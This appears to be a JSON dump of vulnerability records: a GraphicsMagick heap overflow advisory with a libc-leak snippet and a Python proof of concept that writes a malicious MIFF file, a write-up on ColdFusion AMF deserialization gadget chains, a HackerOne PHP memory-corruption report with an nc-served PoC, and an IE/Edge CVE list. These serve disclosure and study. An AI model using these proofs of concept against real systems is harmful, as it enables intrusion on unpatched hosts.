output_leak.index(\"Priority:\") + 12 \nmontage_offset = output_leak.index(\"Montage:\") - 3 \nleak = output_leak[priority_offset:montage_offset] \nif \"0x00000000\" in leak: \nlog.info(\"Unlucky run. 
Value corrupted by StringToList\") \nexit() \nmain_arena_leak = u64(leak.ljust(8, \"\\x00\")) \nlog.info(\"Main Arena Leak: 0x%x\" % main_arena_leak) \nlibc_base = main_arena_leak - libc_main_arena_entry_offset \nlog.info(\"libc Base: 0x%x\" % libc_base) \n \nif __name__ == \"__main__\": \nmain() \n \n \nHeap Overflow \nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file. \n \nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name. \n \n844 /* \n845 Display visual image directory. \n846 */ \n847 image_info=CloneImageInfo((ImageInfo *) NULL); \n848 (void) CloneString(&image_info->size,\"64x64\"); \n849 (void) fprintf(file,\" Directory:\\n\"); \n850 for (p=image->directory; *p != '\\0'; p++) \n851 { \n852 q=p; \n853 while ((*q != '\\n') && (*q != '\\0')) \n854 q++; \n855 (void) strncpy(image_info->filename,p,q-p); \n856 image_info->filename[q-p]='\\0'; \n857 p=q; \n... \n880 } \n881 DestroyImageInfo(image_info); \n \nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name. \n \n \ntype = struct _ImageInfo { \n... \nFILE *file; \nchar magick[2053]; \nchar filename[2053]; \n_CacheInfoPtr_ cache; \nvoid *definitions; \nImage *attributes; \nunsigned int ping; \nPreviewType preview_type; \nunsigned int affirm; \n_BlobInfoPtr_ blob; \nsize_t length; \nchar unique[2053]; \nchar zero[2053]; \nunsigned long signature; \n} \n \nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag. \n \nProof of Concept \nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff. 
\n''' \n \n#!/usr/bin/python \n \nfrom pwn import * \n \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' + \n':\\x1a', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"exploit.miff\" \n \ndef main(): \npayload = \"A\"*10000 \npayload = partitions[0] + payload + partitions[1] \nfile(output, \"w\").write(payload) \n \nif __name__ == \"__main__\": \nmain() \n \n''' \nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful. \n \n \ngefa$? r identify -verbose exploit.miff \n... \ngefa$? br describe.c:856 \nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856. \n... \ngefa$? p *image_info \n$3 = { \n... \ncompression = UndefinedCompression, \nfile = 0x0, \nmagick = '\\000' <repeats 2052 times>, \nfilename = 'A' <repeats 2053 times>, \ncache = 0x4141414141414141, \ndefinitions = 0x4141414141414141, \nattributes = 0x4141414141414141, \nping = 0x41414141, \npreview_type = 1094795585, \naffirm = 0x41414141, \nblob = 0x4141414141414141, \nlength = 0x4141414141414141, \nunique = 'A' <repeats 2053 times>, \nzero = 'A' <repeats 2053 times>, \nsignature = 0x4141414141414141 \n} \n''' \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144878/graphicsmagick-discloseoverflow.txt"}], "seebug": [{"lastseen": "2018-03-31T18:25:41", "bulletinFamily": "exploit", "description": "### Exploiting Adobe ColdFusion before CVE-2017-3066\r\nIn a recent penetration test my teammate Thomas came across several servers running Adobe ColdFusion 11 and 12. Some of them were vulnerable to CVE-2017-3066 but no outgoing TCP connections were possible to exploit the vulnerability. 
He asked me whether I had an idea how he could still get a SYSTEM shell and the outcome of the short research effort is documented here.\r\n\r\n### INTRODUCTION ADOBE COLDFUSION & AMF\r\nBefore we go into technical details, I will give you a short intro to Adobe ColdFusion (CF). Adobe ColdFusion is an Application Development Platform like ASP.net, however several years older. Adobe ColdFusion allows a developer to build websites, SOAP and REST web services and interact with Adobe Flash using the Action Message Format (AMF).\r\n\r\nThe AMF protocol is a custom binary serialization protocol. It has two formats, AMF0 and AMF3. An Action Message consists of headers and bodies. Several data types are supported in AMF0 and AMF3. For example the AMF3 format supports the following protocol elements with their type identifier:\r\n```\r\nUndefined - 0x00\r\nNull - 0x01\r\nBoolean - 0x02\r\nBoolean - 0x03\r\nInteger - 0x04\r\nDouble - 0x05\r\nString - 0x06\r\nXML - 0x07\r\nDate - 0x08\r\nArray - 0x09\r\nObject - 0x0A\r\nXML End - 0x0B\r\nByteArray - 0x0C\r\n```\r\n\r\nDetails about the binary message formats of AMF0 and AMF3 can be found on Wikipedia (see https://en.wikipedia.org/wiki/Action_Message_Format).\r\n\r\nThere are several implementations for AMF in different languages. For Java we have Adobe BlazeDS (now Apache BlazeDS), which is also used in Adobe ColdFusion.\r\n\r\nThe BlazeDS AMF serializer can serialize complex object graphs. The serializer starts with the root object and serializes its members recursively.\r\n\r\nTwo general serialization techniques are supported by BlazeDS to serialize complex objects:\r\n* Serialization of Bean Properties (AMF0 and AMF3)\r\n* Serialization using Java's java.io.Externalizable interface. 
(AMF3)\r\n\r\n### Serialization of Bean Properties\r\nThis technique requires the object to be serialized to have a public no-arg constructor and for every member public Getter-and Setter-Methods (JavaBeans convention).\r\n\r\nIn order to collect all member values of an object, the AMF serializer invokes all Getter-methods during serialization. The member names and values are put in the Action message body with the class name of the object.\r\n\r\nDuring deserialization, the classname is taken from the Action Message, a new object is constructed and for every member name the corresponding set method is called with the value as argument. This all happens either in method readScriptObject() of class flex.messaging.io.amf.Amf3Input or readObjectValue() of class flex.messaging.io.amf.Amf0Input.\r\n\r\n### Serialization using Java's java.io.Externalizable interface\r\nBlazeDS further supports serialization of complex objects of classes implementing the java.io.Externalizable interface which inherits from java.io.Serializable.\r\n```\r\npublic abstract interface Externalizable\r\n extends Serializable\r\n{\r\n public abstract void writeExternal(ObjectOutput paramObjectOutput)\r\n throws IOException;\r\n\r\n public abstract void readExternal(ObjectInput paramObjectInput)\r\n throws IOException, ClassNotFoundException;\r\n}\r\n```\r\n\r\nEvery class implementing this interface needs to provide its own logic to deserialize itself by calling methods on the java.io.ObjectInput-implementation to read serialized primitive types and Strings (e.g. method read(byte[] paramArrayOfByte)).\r\n\r\nDuring deserialization of an object (type 0xa) in AMF3, the method readScriptObject() of class flex.messaging.io.amf.Amf3Input gets called. 
In line #759 the method readExternalizable is invoked which calls the readExternal() method on the object to be deserialized.\r\n```\r\n/* */ protected Object readScriptObject()\r\n/* */ throws ClassNotFoundException, IOException\r\n/* */ {\r\n/* 736 */ int ref = readUInt29();\r\n/* */ \r\n/* 738 */ if ((ref & 0x1) == 0) {\r\n/* 739 */ return getObjectReference(ref >> 1);\r\n/* */ }\r\n/* 741 */ TraitsInfo ti = readTraits(ref);\r\n/* 742 */ String className = ti.getClassName();\r\n/* 743 */ boolean externalizable = ti.isExternalizable();\r\n/* */ \r\n/* */\r\n/* */\r\n/* 747 */ Object[] params = { className, null };\r\n/* 748 */ Object object = createObjectInstance(params);\r\n/* */ \r\n/* */\r\n/* 751 */ className = (String)params[0];\r\n/* 752 */ PropertyProxy proxy = (PropertyProxy)params[1];\r\n/* */ \r\n/* */\r\n/* 755 */ int objectId = rememberObject(object);\r\n/* */ \r\n/* 757 */ if (externalizable)\r\n/* */ {\r\n/* 759 */ readExternalizable(className, object); //<- call to readExternal\r\n/* */ }\r\n/* */ //...\r\n/* */ }\r\n```\r\n\r\nThis should be sufficient to serve as an introduction to Adobe ColdFusion and AMF.\r\n\r\n### PREVIOUS WORK\r\nChris Gates (@Carnal0wnage) published the paper ColdFusion for Pentesters which is an excellent introduction to Adobe ColdFusion.\r\n\r\nWouter Coekaerts (@WouterCoekaerts) already showed in his blog post that deserializing untrusted AMF data is dangerous.\r\n\r\nLooking at the history of Adobe ColdFusion vulnerabilities at Flexera/Secunia's database you can find mostly XSS', XXE's and information disclosures.\r\n\r\nThe most recent ones are:\r\n* Deserialization of untrusted data over RMI (CVE-2017-11283/4 by @nickstadb)\r\n* XXE (CVE-2017-11286 by Daniel Lawson of @depthsecurity)\r\n* XXE (CVE-2016-4264 by @dawid_golunski)\r\n\r\n### CVE-2017-3066\r\nIn 2017 Moritz Bechler of AgNO3 GmbH and my teammate Markus Wulftange discovered independently the vulnerability CVE-2017-3066 in Apache BlazeDS.\r\n\r\nThe core 
problem of this vulnerability was that Adobe Coldfusion never did any whitelisting of allowed classes. Thus any class in the classpath of Adobe ColdFusion, which either fulfills the Java Beans Convention or implements java.io.Externalizable could be sent to the server and get deserialized. Both Moritz and Markus found JRE classes (sun.rmi.server.UnicastRef2 sun.rmi.server.UnicastRef) which implemented the java.io.Externalizable interface and triggered an outgoing TCP connection during AMF3 deserialization. After the connection was made to the attacker's server, its response was deserialized using Java's native deserialization using ObjectInputStream.readObject().\r\n\r\nBoth found a great \"bridge\" from AMF deserialization to Java's native deserialization which offers well known exploitation primitives using public gadgets. Details about the vulnerability can also be found in Markus' blog post. \r\n\r\nApache introduced validation through the class flex.messaging.validators.ClassDeserializationValidator. It has a default whitelist but can also be configured with a configuration file. For details see the Apache BlazeDS release notes.\r\n\r\n### FINDING EXPLOITATION PRIMITIVES BEFORE CVE-2017-3066\r\nAs already mentioned in the very beginning my teammate Thomas required an exploit which also works without outgoing connection.\r\n\r\nI had a quick look into the excellent research paper \"Java Unmarshaller Security\" of Moritz Bechler where he analysed several \"Unmarshallers\" including BlazeDS. The exploitation payloads he discovered weren't applicable since the libraries were missing in the classpath.\r\n\r\nSo I started with my typical approach, fired up my favorite \"reverse engineering tool\" when it comes to Java, Eclipse. Eclipse together with the powerful decompiler plugin \"JD-Eclipse\" (https://github.com/java-decompiler/jd-eclipse) is all you need for static and dynamic analysis. 
As a former Dev I was used to work with IDE's which make your life easier and decompiling and grepping through code is often very inefficient and error prone. So I created a new Java project and added all jar-files of Adobe Coldfusion 12 as external libraries.\r\n\r\nThe first idea was to look for further calls to Java's ObjectInputStream.readObject-method. Using Eclipse this is very easy. Just open class ObjectInputStream, right click on the readObject() method and click \"Open Call Hierarchy\". Thanks to JD-Eclipse and its decompiler, Eclipse is able to construct call graphs based on class information without having any source. The call graph looks big in the very beginning. But with some experience you see very quickly which nodes in the graph are interesting.\r\n\r\nAfter some hours I found two promising call graphs.\r\n\r\n### SETTER-BASED EXPLOIT\r\nThe first one starts with method setState(byte[] new_state) of class org.jgroups.blocks.ReplicatedTree.\r\n\r\n\r\n\r\n\r\nLooking at the implementation of this method, we already can imagine what is happening in line #605.\r\n```\r\n/* */ public void setState(byte[] new_state)\r\n/* */ {\r\n/* 597 */ Node new_root = null;\r\n/* */ \r\n/* */\r\n/* 600 */ if (new_state == null) {\r\n/* 601 */ if (log.isInfoEnabled()) log.info(\"new cache is null\");\r\n/* 602 */ return;\r\n/* */ }\r\n/* */ try {\r\n/* 605 */ Object obj = Util.objectFromByteBuffer(new_state);\r\n/* 606 */ new_root = (Node)((Node)obj).clone();\r\n/* 607 */ root = new_root;\r\n/* 608 */ notifyAllNodesCreated(root);\r\n/* */ }\r\n/* */ catch (Throwable ex) {\r\n/* 611 */ if (log.isErrorEnabled()) { log.error(\"could not set cache: \" + ex);\r\n/* */ }\r\n/* */ }\r\n/* */ }\r\n```\r\n\r\nA quick look at the call graph confirms that we eventually end up in a call to ObjectInputStream.readObject().\r\n\r\nThe only thing to mention here is that the byte[] passed to setState() needs to have an additional byte 0x2 at offset 0x0 as we can see from line 364 of 
class org.jgroups.util.Util.\r\n```\r\n/* */ public static Object objectFromByteBuffer(byte[] buffer, int offset, int length) throws Exception\r\n/* */ {\r\n/* 358 */ if (buffer == null) return null;\r\n/* 359 */ if (JGROUPS_COMPAT)\r\n/* 360 */ return oldObjectFromByteBuffer(buffer, offset, length);\r\n/* 361 */ Object retval = null;\r\n/* 362 */ InputStream in = null;\r\n/* 363 */ ByteArrayInputStream in_stream = new ByteArrayInputStream(buffer, offset, length);\r\n/* 364 */ byte b = (byte)in_stream.read();\r\n/* */ try {\r\n/* */ int len;\r\n/* 367 */ switch (b) {\r\n/* */ case 0:\r\n/* 369 */ return null;\r\n/* */ case 1:\r\n/* 371 */ in = new DataInputStream(in_stream);\r\n/* 372 */ retval = readGenericStreamable((DataInputStream)in);\r\n/* 373 */ break;\r\n/* */ case 2:\r\n/* 375 */ in = new ObjectInputStream(in_stream);\r\n/* 376 */ retval = ((ObjectInputStream)in).readObject();\r\n/* */ //...\r\n/* */ }\r\n/* */ }\r\n/* */ }\r\n```\r\n\r\n\r\nThe exploit can be found in the following image.\r\n\r\n\r\n\r\nThe exploit works against Adobe ColdFusion 12 only since JGroups is only available in this specific version.\r\n\r\n### EXTERNALIZABLE-BASED EXPLOIT\r\nThe second call graph starts in class org.apache.axis2.util.MetaDataEntry with a call to readExternal which is what we are looking for.\r\n\r\n\r\n\r\n\r\nIn line #297 we have a call to SafeObjectInputStream.install(inObject).\r\n```\r\n/* */ public static SafeObjectInputStream install(ObjectInput in)\r\n/* */ {\r\n/* 62 */ if ((in instanceof SafeObjectInputStream)) {\r\n/* 63 */ return (SafeObjectInputStream)in;\r\n/* */ }\r\n/* 65 */ return new SafeObjectInputStream(in) ;\r\n/* */ }\r\nview rawsnippet_org.apache.axis2.context.externalize.SafeObjectInputStream.java hosted with \u2764 by GitHub\r\nIn this function our AMF3Input instance gets wrapped by a org.apache.axis2.context.externalize.SafeObjectInputStream instance.\r\n/* */ private Object readObjectOverride()\r\n/* */ throws IOException, 
ClassNotFoundException\r\n/* */ {\r\n/* 318 */ boolean isActive = in.readBoolean();\r\n/* 319 */ if (!isActive) {\r\n/* 320 */ if (isDebug) {\r\n/* 321 */ log.debug(\"Read object=null\");\r\n/* */ }\r\n/* 323 */ return null;\r\n/* */ }\r\n/* 325 */ Object obj = null;\r\n/* 326 */ boolean isObjectForm = in.readBoolean();\r\n/* 327 */ if (isObjectForm)\r\n/* */ {\r\n/* 329 */ if (isDebug) {\r\n/* 330 */ log.debug(\" reading using object form\");\r\n/* */ }\r\n/* 332 */ obj = in.readObject();\r\n/* */ } else {\r\n/* 334 */ if (isDebug) {\r\n/* 335 */ log.debug(\" reading using byte form\");\r\n/* */ }\r\n/* */ \r\n/* 338 */ ByteArrayInputStream bais = getByteStream(in);\r\n/* */ \r\n/* */\r\n/* 341 */ ObjectInputStream tempOIS = createObjectInputStream(bais);\r\n/* 342 */ obj = tempOIS.readObject();\r\n/* 343 */ tempOIS.close();\r\n/* 344 */ bais.close();\r\n/* */ }\r\n/* */ //...\r\n/* */ }\r\n```\r\n\r\nIn line #341 a new instance of class org.apache.axis2.context.externalize.ObjectInputStreamWithCL is created. This class just extends the standard java.io.ObjectInputStream. In line #342 we finally have our call to readObject().\r\nThe following image shows the request for the exploit. \r\n\r\n\r\n\r\nThe exploit works against Adobe ColdFusion 11 and 12. \r\n\r\n### COLDFUSIONPWN\r\nTo make your life easier I created the simple tool ColdFusionPwn. It works on the command line and allows you to generate the serialized AMF message. It incorporates Chris Frohoff's ysoserial for gadget generation. It can be found on our github.\r\n\r\n### TAKEAWAYS\r\nDeserializing untrusted input is bad, that's for sure. From an exploiters perspective exploiting deserialization vulnerabilities is a challenging task since you need to find the \"right\" objects (gadgets) which trigger functionality you can reuse for exploitation. 
But it's also more fun :-)\r\n\r\nBy the way: If you want to make a deep dive into serverside Java Exploitation and all sorts of deserialization vulnerabilities and how to do proper static and dynamic analysis in Java, you might be interested in our upcoming \"Advanced Java Exploitation\" course.", "modified": "2018-03-30T00:00:00", "published": "2018-03-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-97208", "id": "SSV:97208", "title": "Adobe ColdFusion \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff08CVE-2017-3066\uff09", "type": "seebug", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "hackerone": [{"lastseen": "2019-10-23T18:01:37", "bulletinFamily": "bugbounty", "bounty": 500.0, "description": "In the network interfacing PHP API file_get_contents(), a mechanism is implemented to parse the HTTP/S response from the remote host. A vulnerability is found when the vulnerable PHP build processes certain malformed HTTP/S response packets, resulting an array negative indexing. \n\nVulnerable code at:\n```\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\n\n\t\t\tif (tmp_line[tmp_line_len - 1] == '\\n') {\n\t\t\t\t--tmp_line_len;\n\t\t\t\tif (tmp_line[tmp_line_len - 1] == '\\r') {\n\t\t\t\t\t--tmp_line_len;\n\t\t\t\t}\n```\n\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go to -1, resulting in an extra large string being copied subsequently. 
Under ASAN a segfault can be observed.\n```\n$ bin/php --version\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\nCopyright (c) 1997-2018 The PHP Group\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\n```\n\nTest script:\n```\n---------------\n$ xxd -g 1 poc\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\n```\n```\n$ nc -vvlp 8080 < poc\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\nGET / HTTP/1.0\nHost: localhost:8080\nConnection: close\n\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\n```\nExpected result:\n----------------\nNO CRASH\n\nActual result:\n```\n--------------\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\n=================================================================\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\nREAD of size 1 at 0xbfc038ef thread T0\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\n #10 0x8cbb06b in 
zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\n This frame has 13 object(s):\n [32, 36) 'transport_string'\n [96, 100) 'errstr'\n [160, 164) 'http_header_line_length'\n [224, 232) 'timeout'\n [288, 296) 'req_buf'\n [352, 360) 'tmpstr'\n [416, 432) 'ssl_proxy_peer_name'\n [480, 496) 'http_header'\n [544, 576) 'buf'\n [608, 736) 'tmp_line'\n [768, 1792) 'location'\n [1824, 2848) 'new_path'\n [2880, 3904) 'loc_path'\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\n (longjmp and C++ exceptions *are* supported)\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\nShadow bytes around the buggy address:\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Heap righ 
redzone: fb\n Freed Heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack partial redzone: f4\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n ASan internal: fe\n==26249== ABORTING\nAborted\n```\n\nDetails can be found at https://bugs.php.net/bug.php?id=75981\nThe bug is fixed in the security repo and is pending CVE assignment.\n\n## Impact\n\nA DoS can be triggered when certain conditions are met, or other implications from the subsequent string operations. The affected mechanism is popular as file_get_contents() is a very popular API among PHP based web applications.", "modified": "2019-10-14T04:37:33", "published": "2018-02-27T09:14:23", "id": "H1:320222", "href": "https://hackerone.com/reports/320222", "type": "hackerone", "title": "PHP (IBB): memory corruption while parsing HTTP response", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:48", "bulletinFamily": "info", "description": "### *Detect date*:\n09/12/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Edge and Microsoft Internet Explorer. 
Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, bypass security restrictions and spoof user interface.\n\n### *Affected products*:\nMicrosoft Internet Explorer versions 9 through 11 \nMicrosoft Edge\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8756](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8756>) \n[CVE-2017-8747](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8747>) \n[CVE-2017-8734](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8734>) \n[CVE-2017-8729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8729>) \n[CVE-2017-8728](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8728>) \n[CVE-2017-8757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8757>) \n[CVE-2017-8749](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8749>) \n[CVE-2017-8738](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8738>) \n[CVE-2017-11766](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11766>) \n[CVE-2017-8750](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8750>) \n[CVE-2017-8731](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8731>) \n[CVE-2017-8753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8753>) \n[CVE-2017-8723](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8723>) \n[CVE-2017-8724](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8724>) \n[CVE-2017-8741](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8741>) 
\n[CVE-2017-8754](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8754>) \n[CVE-2017-8740](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8740>) \n[CVE-2017-8752](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8752>) \n[CVE-2017-8597](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8597>) \n[CVE-2017-8660](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8660>) \n[CVE-2017-8736](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8736>) \n[CVE-2017-11764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11764>) \n[CVE-2017-8643](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8643>) \n[CVE-2017-8751](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8751>) \n[CVE-2017-8649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8649>) \n[CVE-2017-8748](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8748>) \n[CVE-2017-8755](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8755>) \n[CVE-2017-8737](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8737>) \n[CVE-2017-8648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8648>) \n[CVE-2017-8739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8739>) \n[CVE-2017-8735](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8735>) \n[CVE-2017-8733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8733>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-8756](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8756>)7.6High 
\n[CVE-2017-8747](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8747>)7.6High \n[CVE-2017-8734](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8734>)7.6High \n[CVE-2017-8729](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8729>)7.6High \n[CVE-2017-8728](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8728>)7.6High \n[CVE-2017-8757](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8757>)7.6High \n[CVE-2017-8749](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8749>)7.6High \n[CVE-2017-8738](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8738>)7.6High \n[CVE-2017-11766](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11766>)7.6High \n[CVE-2017-8750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8750>)7.6High \n[CVE-2017-8731](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8731>)7.6High \n[CVE-2017-8753](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8753>)7.6High \n[CVE-2017-8723](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8723>)4.3High \n[CVE-2017-8724](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8724>)4.3High \n[CVE-2017-8741](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8741>)7.6High \n[CVE-2017-8754](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8754>)4.0High \n[CVE-2017-8740](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8740>)7.6High \n[CVE-2017-8752](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8752>)7.6High \n[CVE-2017-8597](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8597>)4.3High \n[CVE-2017-8660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8660>)9.3High \n[CVE-2017-8736](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8736>)4.3High \n[CVE-2017-11764](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11764>)7.6High \n[CVE-2017-8643](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8643>)4.3High 
